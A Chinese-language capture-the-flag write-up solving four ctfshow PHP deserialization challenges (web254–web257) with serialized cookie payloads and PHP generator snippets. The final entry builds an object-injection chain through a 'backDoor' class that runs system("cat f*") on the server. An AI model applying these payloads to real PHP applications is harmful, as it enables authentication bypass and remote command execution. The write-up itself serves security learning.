1.web254
定义了一个类ctfshowuser,定义了三个变量,定义了了三个函数,这题只要使isVip变量为true即可,就是传入的username和password和原来定义的变量值相等
payload:
username=xxxxxx&password=xxxxxx
2.web255
这题需要在cookie中传递使isVip为true即可,并且需要进行序列化操作
paylaod:
cookie传入,get请求usernmae=xxxxxx&password=xxxxxx
user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
生成序列化内容
class ctfShowUser{
public $isVip=True;
}
$user = urlencode(serialize(new ctfShowUser()));
echo $user;
?>
3.web256
注意login函数是做判断最后返回true或false的,而不是赋值的意思,这题只要username和password不相等即可,isvip还要为true,通过序列化内容达到覆盖掉原有变量的效果
payload:
cookie传入,get请求usernmae=a&password=xxxxxx
user=O%3A11%3A%22ctfShowUser%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A1%3A%22a%22%3Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D
生成序列化内容
class ctfShowUser{
public $username='a';
public $isVip=True;
}
echo urlencode(serialize(new ctfShowUser()));
4.web257
有三个类,想要执行命令就需要使用backdoor这个类,看到在对象执行结束执行了getinfo方法,而getinfo在backdoor类中是执行命令的方法,所以在对象创建的时候可以换成backdoor这个类,构造code变量,在对象结束后就可以执行查看flag的命令
paylaod:
cookie传入,get请求usernmae=xxxxxx&password=xxxxxx
user=O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A17%3A%22system%28%22cat+f%2A%22%29%3B%22%3B%7D%7D
生成序列化内容
class ctfShowUser{
public function __construct(){
$this->class=new backDoor();
}
}
class backDoor{
private $code='system("cat f*");';
}
echo urlencode(serialize(new ctfShowUser()));
参考文章:
ctfshow反序列化